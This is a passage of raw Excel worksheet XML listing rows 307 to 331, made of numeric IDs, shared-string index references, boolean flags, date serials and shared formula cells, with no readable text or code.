        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R307" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S307" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="1">
        <v>4503.0</v>
      </c>
      <c r="B308" s="2" t="s">
        <v>1550</v>
      </c>
      <c r="C308" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D308" s="2" t="s">
        <v>1544</v>
      </c>
      <c r="E308" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F308" s="1" t="s">
        <v>1551</v>
      </c>
      <c r="G308" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="1" t="s">
        <v>1552</v>
      </c>
      <c r="I308" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J308" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K308" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L308" s="1">
        <v>6.0</v>
      </c>
      <c r="M308" s="1">
        <v>21.0</v>
      </c>
      <c r="N308" s="1" t="s">
        <v>1553</v>
      </c>
      <c r="O308" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P308" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q308" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R308" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S308" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="1">
        <v>4504.0</v>
      </c>
      <c r="B309" s="2" t="s">
        <v>1554</v>
      </c>
      <c r="C309" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D309" s="2" t="s">
        <v>1555</v>
      </c>
      <c r="E309" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F309" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G309" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H309" s="1" t="s">
        <v>1556</v>
      </c>
      <c r="I309" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J309" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K309" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L309" s="1">
        <v>6.0</v>
      </c>
      <c r="M309" s="1">
        <v>21.0</v>
      </c>
      <c r="N309" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O309" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P309" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q309" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R309" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S309" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="1">
        <v>4515.0</v>
      </c>
      <c r="B310" s="2" t="s">
        <v>1557</v>
      </c>
      <c r="C310" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D310" s="2" t="s">
        <v>1558</v>
      </c>
      <c r="E310" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F310" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G310" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H310" s="1" t="s">
        <v>1559</v>
      </c>
      <c r="I310" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J310" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="K310" s="2" t="s">
        <v>1541</v>
      </c>
      <c r="L310" s="1">
        <v>6.0</v>
      </c>
      <c r="M310" s="1">
        <v>21.0</v>
      </c>
      <c r="N310" s="1" t="s">
        <v>1560</v>
      </c>
      <c r="O310" s="1" t="s">
        <v>1542</v>
      </c>
      <c r="P310" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q310" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R310" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S310" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="1">
        <v>4521.0</v>
      </c>
      <c r="B311" s="2" t="s">
        <v>1561</v>
      </c>
      <c r="C311" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D311" s="2" t="s">
        <v>1562</v>
      </c>
      <c r="E311" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F311" s="1" t="s">
        <v>1563</v>
      </c>
      <c r="G311" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H311" s="1" t="s">
        <v>1564</v>
      </c>
      <c r="I311" s="1" t="s">
        <v>1565</v>
      </c>
      <c r="J311" s="1" t="s">
        <v>1566</v>
      </c>
      <c r="K311" s="2" t="s">
        <v>1567</v>
      </c>
      <c r="L311" s="1">
        <v>2.0</v>
      </c>
      <c r="M311" s="1">
        <v>2.0</v>
      </c>
      <c r="N311" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O311" s="1" t="s">
        <v>360</v>
      </c>
      <c r="P311" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q311" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R311" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S311" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="1">
        <v>4522.0</v>
      </c>
      <c r="B312" s="2" t="s">
        <v>1568</v>
      </c>
      <c r="C312" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D312" s="2" t="s">
        <v>1569</v>
      </c>
      <c r="E312" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F312" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G312" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H312" s="1" t="s">
        <v>1570</v>
      </c>
      <c r="I312" s="1" t="s">
        <v>1565</v>
      </c>
      <c r="J312" s="1" t="s">
        <v>1566</v>
      </c>
      <c r="K312" s="2" t="s">
        <v>1567</v>
      </c>
      <c r="L312" s="1">
        <v>2.0</v>
      </c>
      <c r="M312" s="1">
        <v>2.0</v>
      </c>
      <c r="N312" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O312" s="1" t="s">
        <v>360</v>
      </c>
      <c r="P312" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q312" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R312" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S312" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="1">
        <v>4631.0</v>
      </c>
      <c r="B313" s="2" t="s">
        <v>1571</v>
      </c>
      <c r="C313" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D313" s="2" t="s">
        <v>1572</v>
      </c>
      <c r="E313" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F313" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="G313" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H313" s="4">
        <v>44689.50347222222</v>
      </c>
      <c r="I313" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J313" s="1" t="s">
        <v>1574</v>
      </c>
      <c r="K313" s="2" t="s">
        <v>1575</v>
      </c>
      <c r="L313" s="1">
        <v>3.0</v>
      </c>
      <c r="M313" s="1">
        <v>6.0</v>
      </c>
      <c r="N313" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O313" s="1" t="s">
        <v>1576</v>
      </c>
      <c r="P313" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q313" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R313" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S313" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="1">
        <v>4632.0</v>
      </c>
      <c r="B314" s="2" t="s">
        <v>1577</v>
      </c>
      <c r="C314" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D314" s="2" t="s">
        <v>1572</v>
      </c>
      <c r="E314" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F314" s="1" t="s">
        <v>859</v>
      </c>
      <c r="G314" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H314" s="4">
        <v>44689.876388888886</v>
      </c>
      <c r="I314" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J314" s="1" t="s">
        <v>1578</v>
      </c>
      <c r="K314" s="2" t="s">
        <v>1575</v>
      </c>
      <c r="L314" s="1">
        <v>1.0</v>
      </c>
      <c r="M314" s="1">
        <v>1.0</v>
      </c>
      <c r="N314" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O314" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P314" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q314" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R314" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S314" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="1">
        <v>4638.0</v>
      </c>
      <c r="B315" s="2" t="s">
        <v>1579</v>
      </c>
      <c r="C315" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D315" s="2" t="s">
        <v>1580</v>
      </c>
      <c r="E315" s="2" t="s">
        <v>605</v>
      </c>
      <c r="F315" s="1" t="s">
        <v>1581</v>
      </c>
      <c r="G315" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H315" s="4">
        <v>44658.02847222222</v>
      </c>
      <c r="I315" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J315" s="1" t="s">
        <v>1583</v>
      </c>
      <c r="K315" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="L315" s="1">
        <v>4.0</v>
      </c>
      <c r="M315" s="1">
        <v>5.0</v>
      </c>
      <c r="N315" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O315" s="1" t="s">
        <v>1585</v>
      </c>
      <c r="P315" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q315" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R315" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S315" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="1">
        <v>4639.0</v>
      </c>
      <c r="B316" s="2" t="s">
        <v>1586</v>
      </c>
      <c r="C316" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D316" s="2" t="s">
        <v>1587</v>
      </c>
      <c r="E316" s="2" t="s">
        <v>1588</v>
      </c>
      <c r="F316" s="1" t="s">
        <v>556</v>
      </c>
      <c r="G316" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H316" s="4">
        <v>44658.03125</v>
      </c>
      <c r="I316" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J316" s="1" t="s">
        <v>1583</v>
      </c>
      <c r="K316" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="L316" s="1">
        <v>4.0</v>
      </c>
      <c r="M316" s="1">
        <v>5.0</v>
      </c>
      <c r="N316" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O316" s="1" t="s">
        <v>1585</v>
      </c>
      <c r="P316" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q316" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R316" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S316" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="1">
        <v>4640.0</v>
      </c>
      <c r="B317" s="2" t="s">
        <v>1589</v>
      </c>
      <c r="C317" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D317" s="2" t="s">
        <v>1590</v>
      </c>
      <c r="E317" s="2" t="s">
        <v>1588</v>
      </c>
      <c r="F317" s="1" t="s">
        <v>1591</v>
      </c>
      <c r="G317" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H317" s="4">
        <v>44658.05347222222</v>
      </c>
      <c r="I317" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J317" s="1" t="s">
        <v>1583</v>
      </c>
      <c r="K317" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="L317" s="1">
        <v>4.0</v>
      </c>
      <c r="M317" s="1">
        <v>5.0</v>
      </c>
      <c r="N317" s="1" t="s">
        <v>137</v>
      </c>
      <c r="O317" s="1" t="s">
        <v>1585</v>
      </c>
      <c r="P317" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q317" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R317" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S317" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="1">
        <v>4641.0</v>
      </c>
      <c r="B318" s="2" t="s">
        <v>1592</v>
      </c>
      <c r="C318" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D318" s="2" t="s">
        <v>1590</v>
      </c>
      <c r="E318" s="2" t="s">
        <v>1588</v>
      </c>
      <c r="F318" s="1" t="s">
        <v>1591</v>
      </c>
      <c r="G318" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H318" s="4">
        <v>44658.05625</v>
      </c>
      <c r="I318" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J318" s="1" t="s">
        <v>1583</v>
      </c>
      <c r="K318" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="L318" s="1">
        <v>4.0</v>
      </c>
      <c r="M318" s="1">
        <v>5.0</v>
      </c>
      <c r="N318" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O318" s="1" t="s">
        <v>1585</v>
      </c>
      <c r="P318" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q318" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R318" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S318" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="1">
        <v>4642.0</v>
      </c>
      <c r="B319" s="2" t="s">
        <v>1593</v>
      </c>
      <c r="C319" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D319" s="2" t="s">
        <v>1594</v>
      </c>
      <c r="E319" s="2" t="s">
        <v>1588</v>
      </c>
      <c r="F319" s="1" t="s">
        <v>1595</v>
      </c>
      <c r="G319" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H319" s="4">
        <v>44658.990277777775</v>
      </c>
      <c r="I319" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J319" s="1" t="s">
        <v>1583</v>
      </c>
      <c r="K319" s="2" t="s">
        <v>1584</v>
      </c>
      <c r="L319" s="1">
        <v>4.0</v>
      </c>
      <c r="M319" s="1">
        <v>5.0</v>
      </c>
      <c r="N319" s="1" t="s">
        <v>1596</v>
      </c>
      <c r="O319" s="1" t="s">
        <v>1585</v>
      </c>
      <c r="P319" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q319" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R319" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S319" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="1">
        <v>4721.0</v>
      </c>
      <c r="B320" s="2" t="s">
        <v>1597</v>
      </c>
      <c r="C320" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D320" s="2" t="s">
        <v>1598</v>
      </c>
      <c r="E320" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F320" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G320" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H320" s="4">
        <v>44721.80486111111</v>
      </c>
      <c r="I320" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J320" s="1" t="s">
        <v>1600</v>
      </c>
      <c r="K320" s="2" t="s">
        <v>1601</v>
      </c>
      <c r="L320" s="1">
        <v>2.0</v>
      </c>
      <c r="M320" s="1">
        <v>2.0</v>
      </c>
      <c r="N320" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O320" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="P320" s="1" t="s">
        <v>1085</v>
      </c>
      <c r="Q320" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R320" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S320" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="1">
        <v>4722.0</v>
      </c>
      <c r="B321" s="2" t="s">
        <v>1603</v>
      </c>
      <c r="C321" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D321" s="2" t="s">
        <v>1604</v>
      </c>
      <c r="E321" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F321" s="1" t="s">
        <v>1605</v>
      </c>
      <c r="G321" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="4">
        <v>44813.61875</v>
      </c>
      <c r="I321" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J321" s="1" t="s">
        <v>1600</v>
      </c>
      <c r="K321" s="2" t="s">
        <v>1601</v>
      </c>
      <c r="L321" s="1">
        <v>2.0</v>
      </c>
      <c r="M321" s="1">
        <v>2.0</v>
      </c>
      <c r="N321" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="O321" s="1" t="s">
        <v>1602</v>
      </c>
      <c r="P321" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q321" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R321" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S321" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="1">
        <v>4737.0</v>
      </c>
      <c r="B322" s="2" t="s">
        <v>1606</v>
      </c>
      <c r="C322" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D322" s="2" t="s">
        <v>1607</v>
      </c>
      <c r="E322" s="2" t="s">
        <v>1608</v>
      </c>
      <c r="F322" s="1" t="s">
        <v>1609</v>
      </c>
      <c r="G322" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H322" s="1" t="s">
        <v>1610</v>
      </c>
      <c r="I322" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J322" s="1" t="s">
        <v>1611</v>
      </c>
      <c r="K322" s="2" t="s">
        <v>1612</v>
      </c>
      <c r="L322" s="1">
        <v>6.0</v>
      </c>
      <c r="M322" s="1">
        <v>18.0</v>
      </c>
      <c r="N322" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O322" s="1" t="s">
        <v>1613</v>
      </c>
      <c r="P322" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q322" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R322" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S322" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="1">
        <v>4768.0</v>
      </c>
      <c r="B323" s="2" t="s">
        <v>1614</v>
      </c>
      <c r="C323" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D323" s="2" t="s">
        <v>1615</v>
      </c>
      <c r="E323" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F323" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G323" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H323" s="4">
        <v>44261.04236111111</v>
      </c>
      <c r="I323" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J323" s="1" t="s">
        <v>1616</v>
      </c>
      <c r="K323" s="2" t="s">
        <v>1617</v>
      </c>
      <c r="L323" s="1">
        <v>1.0</v>
      </c>
      <c r="M323" s="1">
        <v>1.0</v>
      </c>
      <c r="N323" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O323" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P323" s="1" t="s">
        <v>1618</v>
      </c>
      <c r="Q323" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R323" s="2">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="S323" s="1">
        <f t="shared" si="3"/>
        <v>12</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="1">
        <v>4770.0</v>
      </c>
      <c r="B324" s="2" t="s">
        <v>1619</v>
      </c>
      <c r="C324" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D324" s="2" t="s">
        <v>1620</v>
      </c>
      <c r="E324" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F324" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G324" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H324" s="1" t="s">
        <v>1621</v>
      </c>
      <c r="I324" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J324" s="1" t="s">
        <v>1622</v>
      </c>
      <c r="K324" s="2" t="s">
        <v>1623</v>
      </c>
      <c r="L324" s="1">
        <v>4.0</v>
      </c>
      <c r="M324" s="1">
        <v>5.0</v>
      </c>
      <c r="N324" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O324" s="1" t="s">
        <v>1624</v>
      </c>
      <c r="P324" s="1" t="s">
        <v>1625</v>
      </c>
      <c r="Q324" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R324" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S324" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="1">
        <v>4772.0</v>
      </c>
      <c r="B325" s="2" t="s">
        <v>1626</v>
      </c>
      <c r="C325" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D325" s="2" t="s">
        <v>1627</v>
      </c>
      <c r="E325" s="2" t="s">
        <v>405</v>
      </c>
      <c r="F325" s="1" t="s">
        <v>197</v>
      </c>
      <c r="G325" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H325" s="1" t="s">
        <v>1628</v>
      </c>
      <c r="I325" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J325" s="1" t="s">
        <v>1622</v>
      </c>
      <c r="K325" s="2" t="s">
        <v>1623</v>
      </c>
      <c r="L325" s="1">
        <v>4.0</v>
      </c>
      <c r="M325" s="1">
        <v>5.0</v>
      </c>
      <c r="N325" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="O325" s="1" t="s">
        <v>1624</v>
      </c>
      <c r="P325" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q325" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R325" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S325" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="1">
        <v>4776.0</v>
      </c>
      <c r="B326" s="2" t="s">
        <v>1630</v>
      </c>
      <c r="C326" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D326" s="2" t="s">
        <v>1631</v>
      </c>
      <c r="E326" s="2" t="s">
        <v>320</v>
      </c>
      <c r="F326" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G326" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H326" s="4">
        <v>44321.058333333334</v>
      </c>
      <c r="I326" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J326" s="1" t="s">
        <v>1632</v>
      </c>
      <c r="K326" s="2" t="s">
        <v>1633</v>
      </c>
      <c r="L326" s="1">
        <v>8.0</v>
      </c>
      <c r="M326" s="1">
        <v>16.0</v>
      </c>
      <c r="N326" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O326" s="1" t="s">
        <v>1634</v>
      </c>
      <c r="P326" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q326" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R326" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S326" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="1">
        <v>4790.0</v>
      </c>
      <c r="B327" s="2" t="s">
        <v>1635</v>
      </c>
      <c r="C327" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D327" s="2" t="s">
        <v>1636</v>
      </c>
      <c r="E327" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F327" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G327" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H327" s="4">
        <v>44321.82013888889</v>
      </c>
      <c r="I327" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J327" s="1" t="s">
        <v>1632</v>
      </c>
      <c r="K327" s="2" t="s">
        <v>1633</v>
      </c>
      <c r="L327" s="1">
        <v>8.0</v>
      </c>
      <c r="M327" s="1">
        <v>16.0</v>
      </c>
      <c r="N327" s="1" t="s">
        <v>1637</v>
      </c>
      <c r="O327" s="1" t="s">
        <v>1634</v>
      </c>
      <c r="P327" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q327" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R327" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S327" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="1">
        <v>4839.0</v>
      </c>
      <c r="B328" s="2" t="s">
        <v>1638</v>
      </c>
      <c r="C328" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D328" s="2" t="s">
        <v>1639</v>
      </c>
      <c r="E328" s="2" t="s">
        <v>1640</v>
      </c>
      <c r="F328" s="1" t="s">
        <v>1641</v>
      </c>
      <c r="G328" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H328" s="1" t="s">
        <v>1642</v>
      </c>
      <c r="I328" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J328" s="1" t="s">
        <v>1643</v>
      </c>
      <c r="K328" s="2" t="s">
        <v>1644</v>
      </c>
      <c r="L328" s="1">
        <v>2.0</v>
      </c>
      <c r="M328" s="1">
        <v>2.0</v>
      </c>
      <c r="N328" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O328" s="1" t="s">
        <v>1645</v>
      </c>
      <c r="P328" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q328" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R328" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S328" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="1">
        <v>4840.0</v>
      </c>
      <c r="B329" s="2" t="s">
        <v>1646</v>
      </c>
      <c r="C329" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D329" s="2" t="s">
        <v>1647</v>
      </c>
      <c r="E329" s="2" t="s">
        <v>806</v>
      </c>
      <c r="F329" s="1" t="s">
        <v>1648</v>
      </c>
      <c r="G329" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H329" s="1" t="s">
        <v>1649</v>
      </c>
      <c r="I329" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J329" s="1" t="s">
        <v>1643</v>
      </c>
      <c r="K329" s="2" t="s">
        <v>1644</v>
      </c>
      <c r="L329" s="1">
        <v>2.0</v>
      </c>
      <c r="M329" s="1">
        <v>2.0</v>
      </c>
      <c r="N329" s="1" t="s">
        <v>1645</v>
      </c>
      <c r="O329" s="1" t="s">
        <v>1645</v>
      </c>
      <c r="P329" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q329" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R329" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S329" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="1">
        <v>4841.0</v>
      </c>
      <c r="B330" s="2" t="s">
        <v>1650</v>
      </c>
      <c r="C330" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D330" s="2" t="s">
        <v>1651</v>
      </c>
      <c r="E330" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F330" s="1" t="s">
        <v>768</v>
      </c>
      <c r="G330" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H330" s="4">
        <v>44565.53055555555</v>
      </c>
      <c r="I330" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J330" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K330" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L330" s="1">
        <v>6.0</v>
      </c>
      <c r="M330" s="1">
        <v>8.0</v>
      </c>
      <c r="N330" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O330" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P330" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q330" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R330" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S330" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="1">
        <v>4842.0</v>
      </c>
      <c r="B331" s="2" t="s">
        <v>1655</v>
      </c>
      <c r="C331" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D331" s="2" t="s">
        <v>1651</v>
      </c>
      <c r="E331" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F331" s="1" t="s">
